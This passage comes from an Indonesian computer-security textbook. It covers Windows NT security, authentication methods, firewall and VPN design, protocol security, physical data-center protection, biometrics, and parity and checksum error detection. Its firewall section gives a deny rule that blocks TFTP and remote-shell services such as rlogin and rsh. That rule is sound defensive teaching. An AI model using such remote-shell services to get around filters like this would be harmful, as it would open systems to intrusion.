1. Disk mirroring (RAID 1) : meliputi penulisan data secara simultan
kedua media penyimpanan yang secara fisik terpisah.
2. Disk stripping dengan Parity (RAID 5) : data ditulis dalam strip-strip
lewat satu array disk yang didalam strip-strip tersebut terdapat
informasi parity yang dapat digunakan untuk meregenerasi data
apabila salah satu disk device dalam strip set mengalami kegagalan.

3. Model Keamanan Windows NT

Dibuat dari beberapa komponen yang bekerja secara bersama-sama untuk


memberikan keamanan logon dan access control list (ACL) dalam NT :

• LSA (Local security Authority) : menjamin user memiliki hak


untuk mengakses system. Inti keamanan yang menciptakan akses
token, mengadministrasi kebijakan keamanan local dan memberikan
layanan otentikasi user.
• Proses logon : menerima permintaan logon dari user (logon interaktif
dan logon remote), menanti masukan username dan password yang
benar. Dibantu oleh Netlogon service.
• Security Account Manager (SAM) : dikenal juga sebagai directory
service database, yang memelihara database untuk account user dan
memberikan layan validasi untuk proses LSA.

Keamanan Komputer 45
• Security Reference Monitor (SRM) : memeriksa status izin user
dalam mengakses, dan hak user untuk memanipulasi obyek serta
membuat pesan-pesan audit.

4. Keamanan Sumber daya lokal

Obyek dalam NT [file, folder (directory), proses, thread, share dan


device], masing-masing akan dilengkapi dengan Obyek Security
Descriptor yang terdiri dari :
• Security ID Owner : menunjukkan user/grup yang memiliki obyek
tersebut, yang memiliki kekuasaan untuk mengubah akses permission
terhadap obyek tersebut.
• Security ID group : digunakan oleh subsistem POSIX saja.
• Discretionary ACL (Access Control List) : identifikasi user dan grup
yang diperbolehkan / ditolak dalam mengakses, dikendalikan oleh
pemilik obyek.
• System ACL : mengendalikan pesan auditing yang dibangkitkan oleh
system, dikendalikan oleh administrator keamanan jaringan.

5. Keamanan Jaringan

Jenis Keamanan Jaringan Windows NT :

• Model keamanan user level : account user akan mendapatkan akses


untuk pemakaian bersama dengan menciptakan share atas directory
atau printer.
o Keunggulan : kemampuan untuk memberikan user tertentu
akses ke sumberdaya yang di-share dan menentukan jenis akses
apa yang diberikan.
o Kelemahan : proses setup yang kompleks karena administrator
harus memberitahu setiap user dan menjaga policy system
keamanan tetap dapat dibawah kendalinya dengan baik.
• Model keamanan Share level : dikaitkan dengan jaringan peer to peer,
dimana user manapun membagi sumber daya dan memutuskan
apakaha diperlukan password untuk suatu akses tertentu.
o Keuntungan : kesederhanaannya yang membuat keamanan
share-level tidak membutuhkan account user untuk
mendapatkan akses.
o Kelemahan : sekali izin akses / password diberikan, tidak ada
kendali atas siap yang menakses sumber daya.
46 Keamanan Komputer
Cara NT menangani keamanan jaringan :

1. Memberikan permission :
• Permission NTFS local
• Permission shere
2. Keamanan RAS (Remote Access Server)
Melakukan remote access user menggunakan dial-up :
• Otentikasi user name dan password yang valid dengan
dial-in permission.
• Callback security : pengecekan nomor telepon yang valid.
• Auditing : menggunakan auditing trails untuk melacak
ke/dari siapa, kapan user memiliki akses ke server dan
sumberdaya apa yang diakses.
3. Pengamanan Layanan internet :
• Firewall terbatas pada Internet Information server (IIS).
• Menginstal tambahan proxy seperti Microsoft Proxy
server.
4. Share administrative :memungkin administrator mendapatkan
akses ke server windows NT atau workstation melalui jaringan

6. Keamanan pada printer

Dilakukan dengan mensetting properties printer :


1. Menentukan permission : full control, Manage document, print
2. Biasanya susunan permission pada NT defaulut :
• Adminstrator – full control
• Owner – Manage document
• Semua user – print
3. Mengontrol print job, terdiri dari :
• Setting waktu cetak
• Prioritas
• Notifikasi (orang yang perlu diberi peringatan)
4. Set auditing information

7. Keamanan Registry

Tools yang disediakan dalam pengaksesan registry :


• System policy editor : mengontrol akses terhadap registry editor,
memungkinkan administrator mengedit dan memodifikasi value
tertentu dalam registry dengan berbasis grafis.
Keamanan Komputer 47
• Registry editor (regedit32.exe) : tools untuk melakukan edit dan
modifikasi value dalam registry.
• Windows NT Diagnostics (winmsd.exe) : memungkinkan user
melihat setting isi registry dan valuenya tanpa harus masuk ke
registry editor sendiri.

Tools backup untuk registry yaitu :


• Regback.exe memanfaatkan command line / remote session untuk
membackupr registry.
• ntbackup.exe : otomatisasi backup HANYA pada Tape drive,
termasuk sebuah kopi dari file backup registry local.
• Emergency Repair Disk (rdisk.exe) : memback-up hive system dan
software dalam registry.

8. Audit dan Pencatatan Log

• Pencatatan logon dan logoff termasuk pencatatan dalam multi entry


login
• Object access (pencatatan akses obyek dan file)
• Privilege Use (paencatatan pemakaian hak user)
• Account Management (manajemen user dan group)
• Policy change (Pencatatan perubahan kebijakan keamanan)
• System event (pencatatan proses restart, shutdown dan pesan system)
• Detailed tracking (pencatatan proses dalam system secara detail)

48 Keamanan Komputer
BAB 5
KEAMANAN JARINGAN
Penggunaan komputer dapat berupa jaringan dengan konfigurasi
tertentu. Hal ini mengakibatkan mekanisme kerjanya juga berbeda
dengan komputer tunggal. Akibatnya untuk keamanan juga memerlukan
penganan yang spesifik.

Tujuan
1. Mengetahui dan Memahami pola kerja jaringan komputer dan
kelemahannya
2. Mengetahui dan Memahami serta dapat merencanakan kebijakan
pengamanan jaringan komputer

PETA KONSEP KEAMANAN JARINGAN

5.1. Membatasi Akses ke Jaringan

A. Membuat tingkatan akses :

Pembatasan-pembatasan dapat dilakukan sehingga memperkecil peluang


penembusan oleh pemakai yang tak diotorisasi, misalnya :
• Pembatasan login. Login hanya diperbolehkan :
• Pada terminal tertentu.
• Hanya ada waktu dan hari tertentu.
• Pembatasan dengan call-back (Login dapat dilakukan siapapun.
Bila telah sukses login, sistem segera memutuskan koneksi dan
memanggil nomor telepon yang telah disepakati, Penyusup tidak
dapat menghubungi lewat sembarang saluran telepon, tapi hanya
pada saluran telepon tertentu).

Keamanan Komputer 49
• Pembatasan jumlah usaha login.
• Login dibatasi sampai tiga kali dan segera dikunci dan diberitahu
ke administrator.
• Semua login direkam dan sistem operasi melaporkan inf ormasi -
informasi berikut :
➢ Waktu, yaitu waktu pemakai login.
➢ Terminal, yaitu terminal dimana pemakai login.
• Tingkat akses yang diizinkan ( read / write / execute / all )

B. Mekanisme kendali akses :

Masalah identifikasi pemakai ketika login disebut otentifikasi pemakai


(user authentication). Kebanyakan metode otentifikasi didasarkan pada
tiga cara, yaitu :

1. Sesuatu yang diketahui pemakai, misalnya :


• Password.
• Kombinasi kunci.
• Nama kecil ibu mertua.
• Dan sebagainya.

2. Sesuatu yang dimiliki pemakai, misalnya :


• Badge.
• Kartu identitas.
• Kunci.
• Dan sebagainya.

3. Sesuatu mengenai (ciri) pemakai, misalnya :


• Sidik jari.
• Sidik suara.
• Foto.
• Tanda tangan.

C. Waspada terhadap Rekayasa sosial :

1. Mengaku sebagi eksekutif yang tidak berhasil mengakses,


menghubungi administrator via telepon/fax.
2. Mengaku sebagai administrator yang perlu mendiagnosa masalah
network, menghubungi end user via email/fax/surat.
50 Keamanan Komputer
3. Mengaku sebagai petugas keamanan e-commerce, menghubungi
customer yang telah bertransaksi untuk mengulang kembali
transaksinya di form yang disediakan olehnya.
4. pencurian surat, password.
5. penyuapan, kekerasan.

D. Membedakan Sumber daya internal dan Eksternal :

Memanfaatkan teknologi firewall yang memisahkan network internal


dengan network eksternal dengan rule tertentu.

E. Sistem Otentikasi User :

Def : adalah proses penentuan identitas dari seseorang yang sebenarnya,


hal ini diperlukan untuk menjaga keutuhan ( integrity ) dan keamanan (
security ) data, pada proses ini seseorang harus dibuktikan siapa dirinya
sebelum menggunakan layanan akses.

Upaya untuk lebih mengamankan proteksi password, antara lain :

1. Salting.
Menambahkan string pendek ke string password yang diberikan
pemakai sehingga mencapai panjang password tertentu.

2. One time password.


• Pemakai harus mengganti password secara teratur. Upaya ini
membatasi peluang password telah diketahui atau dicoba -coba
pemakai lain.
• Bentuk ekstrim pendekatan ini adalah one time password, yaitu
pemakai mendapat satu buku berisi daftar password. Setiap kali
pemakai login, pemakai menggunakan password berikutnya
yang terdapat di daftar password.
• Dengan one time password, pemakai direpotkan keharusan
menjaga agar buku passwordnya jangan sampai dicuri.

3. Satu daftar panjang pertanyaan dan jawaban.


• Variasi terhadap password adalah mengharuskan pemakai
memberi satu daftar pertanyaan panjang dan jawabannya.
Pertanyaan-pertanyaan dan jawabannya dipilih pemakai

Keamanan Komputer 51
sehingga pemakai mudah mengingatnya dan tak perlu
menuliskan di kertas.
• Pertanyaan berikut dapat dipakai, misalnya :
• Siapa orang tua rudy?
• Apa yang diajarkan Rudy waktu SD ?
• Di jalan apa pertama kali ditemukan si dia ?
• Pada saat login, komputer memilih salah satu dari pertanyaan -
pertanyaan secara acak, menanyakan ke pemakai dan
memeriksa jawaban yang diberikan.

4. Tantangan tanggapan (chalenge response).

• Pemakai diberi kebebasan memilih suatu algoritma, misalnya


x3.
• Ketika pemakai login, komputer menuliskan di layar angka 3.
Dalam kasus ini pemakai mengetik angka 27. Algoritma dapat
berbeda di pagi, sore, dan hari berbeda, dari terminal berbeda,
dan seterusnya.

Contoh Produk Otentikasi User, antara lain :

1. Secureid ACE (Access Control Encryption)


System token hardware seperti kartu kredit berdisplay, pemakai
akan menginput nomor pin yang diketahui bersama, lalu
memasukkan pascode bahwa dia pemilik token.

2. S/key (Bellcore)
System software yang membentuk one time password (OTP)
berdasarkan informasi loginterkhir dengan aturan random
tertentu.

3. Password Authentication Protocol (PAP)


Protokol dua arah untuk PPP (Point to point Protocol). Peer
mengirim pasangan user id dan password, authenticator
menyetujuinya.

4. Challenge Handshake Authentication Protocol (CHAP)


S/key pada PAP, protocol 3 arah, authenticator mengirim pesan
tantangan ke peer, peer menghitung nilai lalu mengirimkan ke

52 Keamanan Komputer
authenticator, authenticator menyetujui otentikasi jika
jawabannya sama dengan nilai tadi.

5. Remote Authentication Dial-in User Service (RADIUS)


Untuk hubungan dial-up, menggunakan network access server,
dari suatu host yang menjadi client RADIUS, merupan system
satu titik akses.

6. Terminal Access Controller Access Control System (TACACS)


Protokol keamanan berbasis server dari CISCO System.
Secury\ity Server terpusat dangan file password UNIX, database
otentikasi, otorisasi dan akunting, fungsi digest (transmisi
password yang tidak polos)

5. 2 Melindungi Aset Organisasi

A. Secara Adminsistratif / fisik


• Rencana kemungkinan terhadap bencana
• Program penyaringan calon pegawai system informasi
• Program pelatihan user
• Kebijakan akses network

B. Secara Teknis

B.1. Penerapan Firewall

Istilah pada penerapan Firewall


• Host
Suatu sistem komputer yang terhubung pada suatu network
• Bastion host
Sistem komputer yang harus memiliki tingkat sekuritas yang tinggi
karena sistem ini rawan sekali terhadap serangan hacker dan cracker,
karena biasanya mesin ini diekspos ke network luar (Internet) dan
merupakan titik kontak utama para user dari internal network.
• Packet Filtering
Aksi dari suatu device untuk mengatur secara selektif alur data yang
melintasi suatu network. Packet filter dapat memblok atau
memperbolehkan suatu paket data yang melintasi network tersebut

Keamanan Komputer 53
sesuai dengan kebijaksanaan alur data yang digunakan (security
policy).
• Perimeter network
Suatu network tambahan yang terdapat di antara network yang
dilindungi dengan network eksternal, untuk menyediakan layer
tambahan dari suatu sistem security. Perimeter network juga sering
disebut dengan DMZ (De-Millitarized Zone).

Keuntungan Firewall :

• Firewall merupakan fokus dari segala keputusan sekuritas. Hal ini


disebabkan karena Firewall merupakan satu titik tempat keluar
masuknya trafik internet pada suatu jaringan.
• Firewall dapat menerapkan suatu kebijaksanaan sekuritas. Banyak
sekali service-service yang digunakan di Internet. Tidak semua
service tersebut aman digunakan, oleh karenanya Firewall dapat
berfungsi sebagai penjaga untuk mengawasi service-service mana
yang dapat digunakan untuk menuju dan meninggalkan suatu
network.
• Firewall dapat mencatat segala aktivitas yang berkaitan dengan alur
data secara efisien. Semua trafik yang melalui Firewall dapat diamati
dan dicatat segala aktivitas yang berkenaan dengan alur data tersebut.
Dengan demikian Network Administrator dapat segera mengetahui
jika terdapat aktivitas-aktivitas yang berusaha untuk menyerang
internal network mereka.
• Firewall dapat digunakan untuk membatasi pengunaan sumberdaya
informasi. Mesin yang menggunakan Firewall merupakan mesin yang
terhubung pada beberapa network yang berbeda, sehingga kita dapat
membatasi network mana saja yang dapat mengakses suatu service
yang terdapat pada network lainnya.

Kelemahan Firewall :

• Firewall tidak dapat melindungi network dari serangan koneksi yang


tidak melewatinya (terdapat pintu lain menuju network tersebut).
• Firewall tidak dapat melindungi dari serangan dengan metoda baru
yang belum dikenal oleh Firewall.
• Firewall tidak dapat melindungi dari serangan virus.

54 Keamanan Komputer
Pilihan klasifikasi desain Firewall :

1. Packet Filtering
Sistem paket filtering atau sering juga disebut dengan screening
router adalah router yang melakukan routing paket antara
internal dan eksternal network secara selektif sesuai dengan
security policy yang digunakan pada network tersebut. Informasi
yang digunakan untuk menyeleksi paket-paket tersebut adalah:
• IP address asal
• IP address tujuan
• Protocol (TCP, UDP, atau ICMP)
• Port TCP atau UDP asal
• Port TCP atau UDP tujuan
Beberapa contoh routing paket selektif yang dilakukan oleh
Screening Router :
• Semua koneksi dari luar sistem yang menuju internal
network diblokade kecuali untuk koneksi SMTP
• Memperbolehkan service email dan FTP, tetapi memblok
service-service berbahaya seperti TFTP, X Window, RPC
dan ‘r’ service (rlogin, rsh, rcp, dan lain-lain).
Selain memiliki keuntungan tertentu di antaranya aplikasi
screening router ini dapat bersifat transparan dan
implementasinya relatif lebih murah dibandingkan metode
firewall yang lain, sistem paket filtering ini memiliki beberapa
kekurangan yakni : tingkat securitynya masih rendah, masih
memungkinkan adanya IP Spoofing, tidak ada screening pada
layer-layer di atas network layer.

2. Application Level Gateway (Proxy Services)


Proxy service merupakan aplikasi spesifik atau program server
yang dijalankan pada mesin Firewall, program ini mengambil
user request untuk Internet service (seperti FTP, telnet, HTTP)
dan meneruskannya (bergantung pada security policy) ke host
yang dituju. Dengan kata lain adalah proxy merupakan perantara
antara internal network dengan eksternal network (Internet).
Pada sisi ekternal hanya dikenal mesin proxy tersebut,
sedangkan mesin-mesin yang berada di balik mesin proxy
tersebut tidak terlihat. Akibatnya sistem proxy ini kurang
transparan terhadap user yang ada di dalam

Keamanan Komputer 55
Sistem Proxy ini efektif hanya jika pada konjungsi antara
internal dan eksternal network terdapat mekanisme yang tidak
memperbolehkan kedua network tersebut terlibat dalam
komunikasi langsung.
Keuntungan yang dimiliki oleh sistem proxy ini adalah tingkat
sekuritasnya lebih baik daripada screening router, deteksi paket
yang dilakukan sampai pada layer aplikasi. Sedangkan
kekurangan dari sistem ini adalah perfomansinya lebih rendah
daripada screening router karena terjadi penambahan header
pada paket yang dikirim, aplikasi yang di-support oleh proxy ini
terbatas, serta sistem ini kurang transparan.

Arsitektur dasar firewall :

• Arsitektur dengan dual-homed host (kadang kadang dikenal juga


sebagai dual homed gateway/ DHG)

Sistem DHG menggunakan sebuah komputer dengan (paling sedikit)


dua network-interface. Interface pertama dihubungkan dengan
jaringan internal dan yang lainnya dengan Internet. Dual-homed host
nya sendiri berfungsi sebagai bastion host (front terdepan, bagian
terpenting dalam firewall).

Internet
bastion
host

Arsitektur dengan dual-homed host

• screened-host (screened host gateway/ SHG)

Pada topologi SHG, fungsi firewall dilakukan oleh sebuah screening-


router dan bastion host. Router ini dikonfigurasi sedemikian sehingga
akan menolak semua trafik kecuali yang ditujukan ke bastion host,

56 Keamanan Komputer
sedangkan pada trafik internal tidak dilakukan pembatasan. Dengan
cara ini setiap client servis pada jaringan internal dapat menggunakan
fasilitas komunikasi standard dengan Internet tanpa harus melalui
proxy.

Internet
router

bastion-host
Arsitektur dengan screened-host

• screened subnet (screened subnet gateway/ SSG).

Firewall dengan arsitektur screened-subnet menggunakan dua


screening-router dan jaringan tengah (perimeter network) antara
kedua router tersebut, dimana ditempatkan bastion host. Kelebihan
susunan ini akan terlihat pada waktu optimasi penempatan server.

Arsitektur dengan screened-subnet

Internet
router router
eksternal internal

bastion-host
jaringan tengah

Keamanan Komputer 57
B.2. Penerapan Virtual Privat Network (VPN)

Defenisi VPN

Virtual Private Network atau Jaringan Pribadi Maya sesungguhnya sama


dengan Jaringan Pribadi (Private Network/PN) pada umumnya, di mana
satu jaringan komputer suatu lembaga atau perusahaan di suatu daerah
atau negara terhubung dengan jaringan komputer dari satu grup
perusahaan yang sama di daerah atau negara lain. Perbedaannya hanyalah
pada media penghubung antar jaringan. Kalau pada PN, media
penghubungnya masih merupakan milik perusahaan/grup itu sendiri,
dalam VPN, media penghubungnya adalah jaringan publik seperti
Internet.

Dalam VPN, karena media penghubung antar jaringannya adalah


jaringan publik, diperlukan pengamanan dan pembatasan -pembatasan.
Pengamanan diperlukan untuk menjaga agar tidak sebarang orang dari
jaringan publik dapat masuk ke jaringan pribadi. Yang dikecualikan
hanyalah orang-orang yang terdaftar atau terotentifikasi terlebih dahulu
yang dapat masuk ke jaringan pribadi. Pembatasan diperlukan untuk
menjaga agar tidak semua orang atau user dari jaringan pribadi dapat
mengakses jaringan publik (internet).

Cara membentuk VPN

1. Tunnelling

Sesuai dengan arti tunnel atau lorong, dalam membentuk suatu VPN ini
dibuat suatu tunnel di dalam jaringan publik untuk menghubungkan
antara jaringan yang satu dan jaringan lain dari suatu grup atau
perusahaan.yang ingin membangun VPN tersebut. Seluruh komunikasi
data antarjaringan pribadi akan melalui tunnel ini, sehingga orang atau
user dari jaringan publik yang tidak memiliki izin untuk masuk tidak
akan mampu untuk menyadap, mengacak atau mencuri data yang
melintasi tunnel ini. Ada beberapa metode tunelling yang umum dipakai,
di antaranya:

- IPX To IP Tunnelling, atau


- PPP To IP Tunnelling
58 Keamanan Komputer
IPX To IP tunnelling biasa digunakan dalam jaringan VPN Novell
Netware. Jadi dua jaringan Novell yang terpisah akan tetap dapat saling
melakukan komunikasi data melalui jaringan publik Internet melalui
tunnel ini tanpa kuatir akan adanya gangguan pihak ke -3 yang ingin
mengganggu atau mencuri data. Pada IPX To IP tunnelling, paket data
dengan protokol IPX (standar protokol Novell) akan dibungkus
(encapsulated) terlebih dahulu oleh protokol IP (standar protokol
Internet) sehingga dapat melalui tunnel ini pada jaringan publik Internet.
Sama halnya untuk PPP To IP tunnelling, di mana PPP protokol
diencapsulated oleh IP protokol.

Saat ini beberapa vendor hardware router seperti Cisco, Shiva, Bay
Networks sudah menambahkan kemampuan VPN dengan teknologi
tunnelling pada hardware mereka.

2. Firewall

Sebagaimana layaknya suatu dinding, Firewall akan bertindak sebagai


pelindung atau pembatas terhadap orang-orang yang tidak berhak untuk
mengakses jaringan kita. Umumnya dua jaringan yang terpisah yang
menggunakan Firewall yang sejenis, atau seorang remote user yang
terhubung ke jaringan dengan menggunakan software client yang
terenkripsi akan membentuk suatu VPN, meskipun media penghubung
dari kedua jaringan tersebut atau penghubung antara remote user dengan
jaringan tersebut adalah jaringan publik seperti Internet.

Suatu jaringan yang terhubung ke Internet pasti memiliki IP address


(alamat Internet) khusus untuk masing-masing komputer yang terhubung
dalam jaringan tersebut. Apabila jaringan ini tidak terlindungi oleh tunnel
atau firewall, IP address tadi akan dengan mudahnya dikenali atau
dilacak oleh pihak-pihak yang tidak diinginkan. Akibatnya data yang
terdapat dalam komputer yang terhubung ke jaringan tadi akan dapat
dicuri atau diubah. Dengan adanya pelindung seperti firewall, kita bisa
menyembunyikan (hide) address tadi sehingga tidak dapat dilacak oleh
pihak-pihak yang tidak diinginkan.

Keamanan Komputer 59
Kemampuan firewall dalam penerapannya pada VPN

o IP Hiding/Mapping. Kemampuan ini mengakibatkan IP address


dalam jaringan dipetakan atau ditranslasikan ke suatu IP address
baru. Dengan demikian IP address dalam jaringan tidak akan dikenali
di Internet.

o Privilege Limitation. Dengan kemampuan ini kita dapat membatasi


para user dalam jaringan sesuai dengan otorisasi atau hak yang
diberikan kepadanya. Misalnya, User A hanya boleh mengakses
home page, user B boleh mengakses home page, e-mail dan news,
sedangkan user C hanya boleh mengakses e-mail.

o Outside Limitation. Dengan kemampuan ini kita dapat membatasi


para user dalam jaringan untuk hanya mengakses ke alamat-alamat
tertentu di Internet di luar dari jaringan kita.

o Inside Limitation. Kadang-kadang kita masih memperbolehkan orang


luar untuk mengakses informasi yang tersedia dalam salah satu
komputer (misalnya Web Server) dalam jaringan kita. Selain itu,
tidak diperbolehkan, atau memang sama sekali tidak dizinkan untuk
mengakses seluruh komputer yang terhubung ke jaringan kita.

o Password and Encrypted Authentication. Beberapa user di luar


jaringan memang diizinkan untuk masuk ke jaringan kita untuk
mengakses data dan sebagainya, dengan terlebih dahulu harus
memasukkan password khusus yang sudah terenkripsi.

5.3 Mengamankan saluran terbuka

Protokol TCP/IP merupakan protocol dalam set standar yang terbuka


dalam pengiriman data, untuk itulah perlu dilakukan enkripsi dalam
rangka penanganan keamanan data yang diterapkan pada protocol
tersebut, yang meliputi :

A. Keamanan Panda lapisan Aplikasi

• SET (Secure Electronics Transaction)


o Menentukan bagaimana transaksi mengalir antara
pemakai, pedagang dan bank.
60 Keamanan Komputer
o Menentukan fungsi keamanan : digital signature, hash dan
enkripsi.
o Produk dari Mastercard dan VISA International.

• Secure HTTP
o Produk dari workgroup IETF, diimplementasikan pada
webserver mulai 1995.
o Menentukan mekanisme kriptografi standar untuk
mengenkripsikan pengiriman data http

• Pretty Good Privacy (PGP)


o Standarisasi RFC 1991
o Membuat dan memastikan digital signature, mengenkripsi
– deskripsi dan mengkompresi data.

• Secure MIME (S/MIME)


o Standarisasi RFC 1521
o MIME (Multipurpose Internet Mail Extension)
o Menentukan cara menempelkan file untuk dikirim ke
internet dengan menggunakan metode hirarki dalm
pendefenisian user remi dan sertfikat digitalnya.

• Cybercash
o Standarisasi RFC 1898
o Memproses kartu kredit di internet dengan mengenkripsi
dan menandatangani transaksi secara digital.

B. Keamanan dalam Lapisan Transport

• SSL (Secure Socket Layer)


o Produk Netscape
o Protocol yang menegoisasikan hubungan yang aman
antara client dan server, dengan menggunakan kunci
enkripsi 40-bit.

C. Keamanan dalam Lapisan Network


• IP security Protocol : melindungi protocol client IP pada network
layer.
• IP Authentication header

Keamanan Komputer 61
• IP Encapsulating Security protocol
• Simple-key management for Internet protocol (SKIP)
• Internet security Association and key management protocol
(ISAKMP)
• Internet key management protocol (IKMP)
• Sumber : www.ietf.org

62 Keamanan Komputer
BAB 6
KEAMANAN FISIK DAN BIOMETRICS
6.1 Keamanan Fisik

Definisi:
Tindakan atau cara yang dilakukan untuk mencegah atau menanggulangi
dan menjaga hardware, program, jaringan dan data dari bahaya fisik dan
kejadian yang dapat menyebabkan kehilangan yang besar atau
kehancuran. Keamanan fisik termasuk perlindungan terhadap kebakara n,
bencana alam, pencurian, vandalism dan teroris

Tujuan :
1. Mengetahui dan Memahami Keamanan Fisik untuk Komputer
2. Mengetahui dan Memahami Biometrics

Yang perlu dilindungi adalah:

• Bangunan
• Ruang Komputer
• Komputer
• Media Penyimpanan

Dilindungi terhadap :

• Lingkungan
–Kebakaran
–Iklim
–Gempa Bumi dan Getaran
–Air
–Listrik
–Petir
• Orang

Keamanan Fisik awalnya dianggap tidak penting bahkan sering


diabaikan dan karena sering banyak kejadian, seperti Pencurian fisik:
laptop, harddisk, CD dan bencana alam maka :

Keamanan Komputer 63
• Kebijakan keamanan fisik mulai diperhatikan, dilihat
ulang dan diperbaiki
• Bagaimana menjaga data agar tetap aman jika terjadi
bencana alam
• Bagaimana strategi pemulihan kembali setelah terjadi
bencana
• Bagaimana pengontrolan akses fisik
• Bagaimana standar ruangan server
• Bagaimana penyimpanan data
• Bagaimana prosedur backup
• Bagaimana standar keamanan gedung tempat data center

6.1.1 Ancaman dan Resiko Pada Data Center

• Faktor lingkungan

• kebakaran,
• banjir,
• embun,
• suhu,
• listrik,
• gempa bumi dan
• bentuk- bentuk bencana alam lainnya

• Faktor manusia

• Eksploitasi

• Faktor finansial

• Butuh investasi yang cukup lumayan

6.1.2 Metode Pengamanan Fisik pada Data Center

• Faktor lingkungan

• Bangunan
• Kebakaran

64 Keamanan Komputer
• Suhu/Iklim
• Listrik
• Bencana alam
• Air
• Petir

• Faktor lingkungan –Bangunan(Lokasi)

• Lokasi data center dipilih yang memiliki sedikit resiko terhadap


bencana alam dan ancaman teroris
• Sebaiknya terpisah dengan kantor pusat
• Jauh dari jalan raya utama
• Lokasi tidak bertetangga dengan bandar udara, pabrik kimia,
jalur pipa gas, pusat keramaian dan pusat pembangkit listrik
• Memiliki kecukupan tenaga listrik

• Faktor lingkungan –Bangunan (kontruksi bangunan)

• Perhatikan mengenai sirkulasi udara, terkait dengan suhu.


Kebanyakan sedikit jendela dan tertutup.
• Gunakan standar pendingin ruangan
• Bahan bangunan tidak mudah terbakar
• Kontruksi bangunan tahan gempa
• Instalasi listrik yang baik, terutama grounding
• Pintu masuk dirancang sangat terbatas
• Pintu kebakaran dirancang untuk keluar saja

• Faktor lingkungan –Bangunan (pengamanan di sekeliling bangunan)

• Memiliki jarak +/-10 meter dari bangunan lain/pohon


• Gunakan CCTV untuk pengawasan di sekitar bangunan
• Perlu pepohonan dan taman agar tersembunyi dari orang lewat
dan pengintai
• Area parkir kendaraan perlu diawasi, gunakan petugas yang
profesional dan detektor bom

• Faktor lingkungan –Bangunan (pengamanan di dalam bangunan)

• Perlu kamera pengawas, sensor asap, sensor kebakaran.


• Pengawasan terhadap pintu masuk dan keluar
Keamanan Komputer 65
• Faktor lingkungan –Kebakaran

• Suplai listrik yang baik perlu diperhatikan


• Bangunan tidak mudah terbakar
• Gunakan sensor asap, sensor panas, pemadam api dan sistem
penyemprot air. Periksa secara periodik
• Gunakan alarm kebakaran baik yang manual maupun yang
otomatis
• Perlu kebijakan dilarang merokok di ruang komputer

• Faktor lingkungan –Suhu/Iklim

• Perlu sensor suhu di ruang server


• Gunakan AC yang cukup untuk membuat ruangan tetap dingin
• Suhu yang baik 10-26 derajat Celcius
• Kelembaban antara 20-80 persen
• Gunakan alarm bila melebihi batas suhu dan kelembaban
• Pendingin dan pemanas perlu diberi filter untuk menghindari
debu

• Faktor lingkungan –Listrik

• Voltase dan daya harus cukup


• Grounding yang baik
• Perlu stabiliser
• Perlu listrik cadangan, seperti UPS dan Genset

• Faktor lingkungan –Bencana alam

• Bangunan harus jauh dari daerah yang sering dilanda bencana


alam.
• Kontruksi bangunan harus tahan gempa
• Pastikan kalau terjadi gempa yang kuat, tidak ada benda-benda
yang jatuh menimpa komputer.
• B A C K U P !!
• Penyimpanan hasil data backup perlu diperhatikan
• Harus aman dari penyusup, ruangan harus baik, bebas debu,
tidak lembab dan tidak mudah terbakar

66 Keamanan Komputer
• Faktor lingkungan –Air

• Banjir dapat terjadi karena hujan, air dari kamar mandi meluap,
dari sprinklers. Pastikan terhindar dari semuanya itu
• Bila komputer terlanjur basah, keringkan dahulu sebelum
dinyalakan
• Gunakan sensor air di lantai dekat komputer.

• Faktor lingkungan –Petir

• Gunakan penangkal petir yang baik


• Kabel penangkal petir harus sampai mencapai air tanah
• Bila terjadi petir yang sering, matikan komputer dan lepaskan
kabel-kabel, seperti kabel listrik, kabel jaringan.

• Faktor Manusia

• Sering kali eksploitasi dilakukan oleh orang dalam


• Digunakan teknologi biometric
• Biasanya digunakan sebagai otentikasi untuk masuk ke ruangan
khusus, seperti ruang server, ruang komputer atau untuk
mengakses suatu sistem

6.2 Biometrics

Dapat berupa:

• Sidik jari,
• Telapak tangan,
• Pola retina,
• Pola suara,
• Tanda tangan dan
• Pola mengetik.

• SIDIK JARI

• Setiap manusia memiliki sidik jari yang unik


• Pemeriksaan pada pola dari minutiae
• Sebuah jari memiliki minutiae sampai 150

Keamanan Komputer 67
• Kelemahan: luka bakar dan luka fisik pada jari
• debu, keringat, minyak dan lem pada jari bisa
mempengaruhi

• TELAPAK TANGAN

• Setiap manusia memiliki pola telapak tangan yang unik


• Pemeriksaan dilakukan pada guratan tangan
• Luka, bengkak dan pemakaian cincin pada tangan dapat
mempengaruhi sistem ini

• POLA RETINA

• Setiap manusia memiliki pola retina yang unik


• Menggunakan sinar infra merah
• Pengukuran dilakukan intensitas cahaya dari pembuluh
darah pada retina
• Sangat terpercaya, tetapi kurang diterima
• Ditakutkan membutakan mata

• POLA SUARA

• Setiap manusia memiliki pola suara dan akustik yang


unik
• Suara dikonversi ke bentuk digital lalu dibandingkan
dengan pola yang sudah tersimpan
• Penyakit pernapasan, luka, stress dan gangguan dari
suara latar belakang dapat mempengaruhi sistem ini

• POLA TANDATANGAN

• Setiap manusia memiliki pola tandatangan yang unik


• Menggunakan pad dan pen biometric yang dihubungkan
ke komputer
• Tandatangan dikonversi ke dalam bentuk signal digital
• Tekanan pen pada saat tandatangan dapat
mempengaruhi bentuk signal digital

68 Keamanan Komputer
• POLA KETIKAN

• Setiap manusia memiliki pola atau ritme mengetik


• Sistem memberikan sebuah kalimat untuk kita ketik
• Pola dan ritme mengetik yang kita lakukan akan
dibandingkan dengan pola yang telah tersimpan.

Keamanan Komputer 69
BAB 7
ERROR DETECTION
Tujuan :
1. Mengetahui apakah data yang dikirim melalui saluran
telekomunikasi atau data yang disimpan telah mengalami
perubahan atau tidak.

7.1 Parity Check

Menambahkan parity bit dari rangkaian bit yang mau dikirim atau
disimpan 10101101 101011011

Ada 2 metode parity


a. Even Parity
b. Odd Parity

a. Even Parity
• Parity bit bernilai 1 bila jumlah bit 1 adalah ganjil
• Parity bit bernilai 0 bila jumlah bit 1 adalah genap
10101010 101010100

b. Odd Parity
• Parity bit bernilai 1 bila jumlah bit 1 adalah genap
• Parity bit bernilai 0 bila jumlah bit 1adalah ganjil
10101010 101010101

7.2 CheckSum

Langkah-langkah pencarian
1. Jumlahkan semua byte
2. Hilangkan carry bila ada
3. Cari two’s complement hasil nomer 2 checksum

Contoh:
Diberikan 4 byte: 0x15, 0x7F, 0x86, 0x5C
1. 0x15 + 0x7F + 0x86 + 0x5C = 0x176
2. 0x176 0x76
3. Two’s complement(0x76) = 0x8A.

70 Keamanan Komputer
Checksum = 0X8A

Cara pengetasan CheckSum

1. Tambahkan nilai checksum dengan nilai hasil penjumlahan


seluruh byte, hasilnya pasti 0x100
